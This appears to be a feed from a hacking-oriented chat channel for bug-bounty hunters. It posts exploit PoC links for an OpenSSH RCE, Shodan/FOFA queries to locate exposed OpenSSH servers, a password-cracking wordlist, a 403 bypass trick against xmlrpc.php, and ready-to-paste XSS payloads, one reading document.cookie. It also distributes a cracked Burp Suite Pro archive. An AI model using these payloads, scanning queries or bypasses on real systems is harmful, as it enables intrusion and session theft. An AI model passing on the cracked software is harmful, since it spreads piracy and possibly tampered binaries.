haxshadow

Live stream started

16:27

haxshadow

Live stream finished (2 minutes)

16:29

haxshadow

❤2🤮1

1.25K views18:45

haxshadow

🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated RCE as root on glibc-based Linux systems; that presents a significant security risk.

👇Query
Hunter: /product.name="OpenSSH"
FOFA: app="OpenSSH"
SHODAN: product:"OpenSSH"

🤮3❤1

1.3K views18:46

haxshadow

https://youtu.be/X38Ufox6eGI?si=yKLMyiEIWwGtarCu

YouTube

POC for CVE-2024-6387 Remote Code Execution | Bug bounty poc

// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing & bug hunting so that we can protect ourselves against the real hackers..…

❤2🤮1

1.37K views19:19

haxshadow

https://youtu.be/-zJNtZRaQ34

YouTube

POC for CVE-2024-36401 GeoServer Remote Code Execution | Bug bounty poc

❤3🤮1

1.34K views19:11

haxshadow

latest 2024 rockyou list for password cracking & bruteforcing dir https://t.co/7rW9Q9Nx0M

❤3🤮2

1.36K viewsedited 04:29

haxshadow

403 Forbidden Bypass
https://target.com/xmlrpc.php 403 ok
https://target.com////xmlrpc.php 200 ok

❤4👏4🤣3👍1💩1

1.25K views14:16

haxshadow

https://youtu.be/EUBhZOFAcxA

YouTube

stored xss that made 100$ Bounty | bug bounty poc

1.45K views17:17

haxshadow

https://youtu.be/EUBhZOFAcxA

XSS Payload

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><img src=x onerror=confirm(document.cookie)>

<sVg/onLy=1 onLoaD=confirm(1)//

1.52K views17:18

haxshadow

https://youtube.com/post/UgkxJ9oi86lCKQvAYw8YFg4UDO0WcJ_ACeKt?si=GZSh75zz18MaTchJ

YouTube

Post from Haxshadow

Sorry I can't post videos for so long. Due to the quota movement here, the video is not possible as the internet and current are off #saveBangladeshstudent #...

1.44K views15:48

haxshadow

I am back ..

1.36K views12:54

haxshadow

https://youtu.be/mnXTx4y8KpY

YouTube

Latest Check point:CVE exploit-2024-34750 | Bug bounty poc

1.52K views12:56

haxshadow

Burp Suite Pro v2024.7.1 Cracked

1.57K views16:10

haxshadow

BurpSuitePro.tar.gz

309.3 MB

❤4

1.95K views16:18

haxshadow

try this amazingg xss scanner made by our brother sarper its so fast bcz of new method it can scan 1k urls in just 5-20 sec with 99% success rate it scan urls with xss polyglots payloads and run on all urls parameters just put all urls in wordlist file ones you get hit just open that link directly and xss popup show ❤️
https://github.com/sarperavci/MXS

👍2❤1

1.52K views13:26

haxshadow

try this tool to find broken linkHijacking thanx to nafeed to sharing me https://github.com/H4cker-Nafeed/Nafeed-Broken-Link

GitHub

GitHub - H4cker-Nafeed/Nafeed-Broken-Link: Nafeed-Broken-Link: A Python tool designed to check for broken social media links on…

Nafeed-Broken-Link: A Python tool designed to check for broken social media links on a given domain. This script crawls all accessible pages of a specified domain and identifies social media links,...

👍1

1.41K views14:15

haxshadow

try this xss pollyglots to bypass waf it will sure help you just use it manully+oneliner commands https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

GitHub